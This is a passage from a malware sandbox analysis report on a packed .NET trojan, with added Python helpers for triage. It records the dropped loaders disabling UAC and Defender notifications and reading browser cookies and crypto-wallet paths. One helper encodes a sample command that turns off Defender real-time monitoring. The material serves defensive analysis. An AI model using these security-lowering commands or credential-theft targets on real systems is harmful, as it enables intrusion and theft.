Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
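The two Loader.exe -> powershell.exe process-creation rows earlier in this section carry the script as a -enc argument, i.e. base64 over the UTF-16LE bytes of the script. As reproduced there the argument is entirely lower-case; base64 is case-sensitive, so that copy cannot be decoded as shown and the original case has to be taken from the raw process-creation event. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it extracts the -EncodedCommand argument, decodes it, checks that the result really is UTF-16LE text, and reports the lower-case problem when it sees it. The command line it decodes is a constructed sample; the Set-MpPreference script inside it is illustrative and is not the content of the report's blob.

```python
import base64
import re

# Constructed sample (not the blob from the report): the UTF-16LE/base64 form that
# powershell.exe -EncodedCommand expects, built here so the example runs offline.
# The script text is illustrative only.
SAMPLE_SCRIPT = "Set-MpPreference -DisableRealtimeMonitoring $true\r\nStart-Sleep 1\r\n"
SAMPLE_CMDLINE = "powershell.exe -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")
).decode("ascii")

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; the common ones
# (-e, -ec, -en, -enc, -encodedcommand) are listed. -ep/-ex (ExecutionPolicy) do not match.
ENC_ARG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def _is_utf16le_text(raw: bytes) -> bool:
    """Heuristic check that raw is UTF-16LE text: every code unit has a zero high
    byte and a printable (or tab/CR/LF) low byte. Scripts that contain non-ASCII
    characters would fail this and need a full UTF-16 decode instead."""
    if not raw or len(raw) % 2:
        return False
    high, low = raw[1::2], raw[0::2]
    return not any(high) and all(32 <= b < 127 or b in (9, 10, 13) for b in low)


def decode_encoded_command(cmdline: str) -> dict:
    """Extract and decode the -EncodedCommand argument of a PowerShell command line.

    Returns {'blob', 'script', 'warning'}; 'script' is None when the argument is
    absent or does not decode to UTF-16LE text."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return {"blob": None, "script": None, "warning": "no -EncodedCommand argument"}
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError
        return {"blob": blob, "script": None, "warning": f"base64 error: {exc}"}
    if _is_utf16le_text(raw):
        return {"blob": blob, "script": raw.decode("utf-16-le"), "warning": None}
    if blob == blob.lower():
        # Base64 is case-sensitive. An all-lower-case blob is the signature of a
        # command line that was case-normalised before logging (as in the report
        # rows above); the bytes it yields are not the script.
        warning = ("argument is entirely lower-case: the command line was case-normalised "
                   "and cannot be decoded as shown; take the original case from the raw "
                   "process-creation event")
    else:
        warning = "argument does not decode to UTF-16LE text (other encoding or binary payload)"
    return {"blob": blob, "script": None, "warning": warning}


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, SAMPLE_CMDLINE.lower()):
        print(decode_encoded_command(line))
```

Run as a script it decodes the constructed command line once with its case intact and once lower-cased; the second run is what happens with the rows above, and the warning rather than a garbage script is the result a triage pipeline should surface.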

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry value created: promptonsecuredesktop 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration Registry value created: Notification_Suppress 1
Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr Binary or memory string: MSASCui.exe
Source: Amcache.hve.30.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.30.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.30.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr Binary or memory string: procexp.exe
Source: Loaader.exe, 00000015.00000002.3522971860.000000001B940000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3532252741.000000001BBEC000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3549502589.000000001BCF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Amcache.hve.30.dr, Loaader.exe.3.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
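Read together, the rows in this section show the dropped Loaader.exe writing the UAC policy values (promptonsecuredesktop 0, and enablelua with no data reported), the spawned powershell.exe writing DisableNotifications 1 under the Windows Defender Security Center key, Notification_Suppress 1 being created under the Defender UX Configuration policy key, and both Loader.exe and Loaader.exe enumerating installed antivirus through root\SecurityCenter2. The Python below is an added example and not part of the report: it parses rows in the shape shown above and flags each write that moves a setting away from the value a default, hardened host carries (EnableLUA=1, PromptOnSecureDesktop=1, notifications not suppressed), treating a write whose data the row does not give as something to confirm on the host. The sample rows are copied from this section, with one benign volume-information row added as a control.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Rows copied from this section of the report (one WMI row kept; the report repeats it
# once per process instance), plus one benign volume-information row as a control.
REPORT_ROWS = [
    r"Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry value created: promptonsecuredesktop 0",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1",
    r"Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration Registry value created: Notification_Suppress 1",
    r"Source: C:\Users\user\AppData\Roaming\Loaader.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System enablelua",
    r"Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation",
]

REGISTRY_ROW = re.compile(
    r"^Source: (?P<source>.+?) Registry (?:key )?value created(?: / modified)?: (?P<tail>.+)$"
)
WMI_AV_ROW = re.compile(
    r"^Source: (?P<source>.+?) WMI Queries: .*root\\SecurityCenter2 : Select \* from AntivirusProduct",
    re.IGNORECASE,
)

# Value name (lower-cased) -> (what it controls, value on a default hardened host).
# Only the four values written in this section are listed.
SECURITY_SETTINGS = {
    "enablelua": ("User Account Control (EnableLUA)", 1),
    "promptonsecuredesktop": ("UAC prompt on the secure desktop (PromptOnSecureDesktop)", 1),
    "disablenotifications": ("Windows Security notifications (DisableNotifications)", 0),
    "notification_suppress": ("Defender UX notifications (Notification_Suppress)", 0),
}


@dataclass
class Finding:
    source: str
    setting: str
    observed: Optional[int]  # None when the row does not report the data written
    verdict: str


def parse_registry_row(row: str):
    """Split a registry-write row into (source, key, value name, data).

    The report prints '<key> <name> <data>' with key and data both optional, so the
    tail is read from the right: a trailing integer is the data, the token before it
    is the value name, whatever is left is the key path."""
    m = REGISTRY_ROW.match(row)
    if not m:
        return None
    tokens = m.group("tail").split()
    data = int(tokens.pop()) if tokens and tokens[-1].lstrip("-").isdigit() else None
    name = tokens.pop() if tokens else ""
    key = " ".join(tokens) or None
    return m.group("source"), key, name, data


def assess(rows):
    """Turn report rows into findings about lowered security settings and AV discovery."""
    findings = []
    for row in rows:
        parsed = parse_registry_row(row)
        if parsed:
            source, _key, name, data = parsed
            entry = SECURITY_SETTINGS.get(name.lower())
            if entry is None:
                continue
            setting, hardened = entry
            if data is None:
                verdict = "written, data not reported: confirm the value on the host"
            elif data == hardened:
                verdict = "set to the hardened value"
            else:
                verdict = f"lowered: {name}={data}, hardened value is {hardened}"
            findings.append(Finding(source, setting, data, verdict))
            continue
        m = WMI_AV_ROW.match(row)
        if m:
            findings.append(Finding(m.group("source"),
                                    "Antivirus discovery (root\\SecurityCenter2 AntivirusProduct)",
                                    None, "installed security products enumerated"))
    return findings


if __name__ == "__main__":
    for f in assess(REPORT_ROWS):
        print(f"{f.source}: {f.setting}: {f.verdict}")
```

The parser reads the value tail from the right because the report omits the key path for some writes and the data for others; a host-side check of the same four values (EnableLUA and PromptOnSecureDesktop under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, plus the two notification values) is the natural follow-up for the enablelua row, whose data the report does not show.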

Stealing of Sensitive Information

Source: Yara match File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Yara match File source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Loader.exe PID: 7384, type: MEMORYSTR
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: Loader.exe, 00000014.00000002.2527964251.00000000029E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: exodus
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Ethereum\keystore
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\256.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png
Source: C:\Users\user\AppData\Roaming\Loaader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png
Source: C:\Users\user\AppData\Roaming\Loader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png Jump to behavior
